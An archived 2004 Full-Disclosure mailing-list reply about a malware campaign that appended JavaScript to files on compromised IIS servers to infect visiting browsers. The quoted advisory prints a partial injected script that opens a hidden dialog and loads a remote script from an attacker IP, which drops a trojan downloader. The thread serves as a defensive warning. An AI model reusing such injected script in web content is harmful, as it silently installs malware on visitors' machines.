Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: insecure (insecure_at_ameritech.net)
Date: 06/25/04

  • Next message: Khan Shirani: "[Full-Disclosure] Multiple remote & local buffer overflows discovered in Drcatd" 
    To: full-disclosure@lists.netsys.com
Date: Fri, 25 Jun 2004 12:36:41 -0500

    Berbew/Webber/Padodor Trojan, according to Lurhq.

    http://www.lurhq.com/berbew.html

    joe wrote:

    >For the IIS side....
    >
    >http://www.microsoft.com/security/incident/download_ject.mspx
    >
    >
    >
    >Microsoft teams are investigating a report of a security issue affecting
    >customers using Microsoft Internet Information Services 5.0 (IIS) and
    >Microsoft Internet Explorer, components of Windows.
    >
    >Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
    >at risk.
    >
    >Reports indicate that Web servers running Windows 2000 Server and IIS that
    >have not applied update 835732, which was addressed by Microsoft Security
    >Bulletin MS04-011, are possibly being compromised and being used to attempt
    >to infect users of Internet Explorer with malicious code.
    >
    >
    >
    >
    >
    >
    >-----Original Message-----
    >From: full-disclosure-admin@lists.netsys.com
    >[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Peter Kruse
    >Sent: Thursday, June 24, 2004 7:22 PM
    >To: full-disclosure@lists.netsys.com
    >Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
    >clients
    >
    >Hi all,
    >
    >This is a heads up.
    >
    >A new malware has been reported from several sources so it appears to be
    >fairly widespread already.
    >
    >The malware spreads from infected IIS servers to clients that visit the
    >webpage of the infected server. How the IIS servers was compromised in the
    >first place is unfortunately still unknown (any info on that would be
    >appreciated).
    >
    >The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
    >so by running a javascript that apparently gets appended to several files in
    >the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
    >217.107.218.147/xxx.html that contains the following code:
    >
    ><script language="Javascript">
    >
    > function InjectedDuringRedirection(){
    > showModalDialog('md.htm', window, "dialog
    >Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
    >:1\;").location= " java script:'<SCRIPT SRC =\\' http://
    >217.107.218.147/shellxxx.js\\'> <\ /script>'";
    >
    >[snip - you get the picture, right?]
    >
    >I had to put in some spaces to get past trivial content filtering.
    >
    >>From that point it will try to run the malware in a 1x1 dialogbox in the
    >following order:
    >
    >shellscript_loadxxx.js
    >shellxxx.js
    >
    >The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
    >trojan-downloader and run it.
    >
    >Consider to deny access to http://217.107.218.147 in your firewall. This
    >will at least prevent client PCs from getting infected.
    >
    >Further information can be found in the daily log from SANS:
    >http://isc.sans.org/
    >
    >Regards
    >Peter Kruse
    >http://www.csis.dk
    >
    >_______________________________________________
    >Full-Disclosure - We believe in it.
    >Charter: http://lists.netsys.com/full-disclosure-charter.html
    >
    >_______________________________________________
    >Full-Disclosure - We believe in it.
    >Charter: http://lists.netsys.com/full-disclosure-charter.html
    >
    >
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Khan Shirani: "[Full-Disclosure] Multiple remote & local buffer overflows discovered in Drcatd"

    Relevant Pages

    • RE: Boot device error 0x0000007B+0xf789e63c
      ... says that main problem with booting servers from SANs is ... > Blue Screen Preparation Before Contacting Microsoft ... > Windows NT ... > the Selective Startup button. ...
      (microsoft.public.windows.server.migration)
    • RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
      ... Also there are other mentions of Windows Servers replacing UNIX servers. ... Because the people speaking don't code and the vendor probably said so. ... computers were replaced by Dell computers using Microsoft software. ...
      (Full-Disclosure)
    • Re: 4.4.7 NDRs on sent email - messages remain in STMP queue until expiry
      ... the free email servers seems very hit and miss. ... This issue occurs may because the Symantec Antivirus Corporate Edition ... Microsoft Exchange Server servers or on Microsoft Windows SMTP servers. ... Please collect the MPS Report for Exchange: ...
      (microsoft.public.windows.server.sbs)
    • Re: Cannot add users from trusted domain
      ... Windows 2003 domain to any folders. ... on these servers, but we cannot add any new ones. ... Were you able to add the Windows 2003 AD Domain Admins tothe NT4 ... This is a direct link to the Microsoft Public ...
      (microsoft.public.win2000.active_directory)
    • Re: Microsoft Censorship PROVES it is a Corporate Scumbag!
      ... The above post was pulled from MS's Servers. ... EVERY time someone needs telephone activation it costs Microsoft for overseas phone charges and labor costs. ... They are bound to incorporate a few more ideas in each version of Windows that were previously available in Linux and Macintosh operating systems though. ... There's a good probability your parents, grandparents or neighbors own a little bit of Microsoft through a mutual fund. ...
      (microsoft.public.windowsxp.general)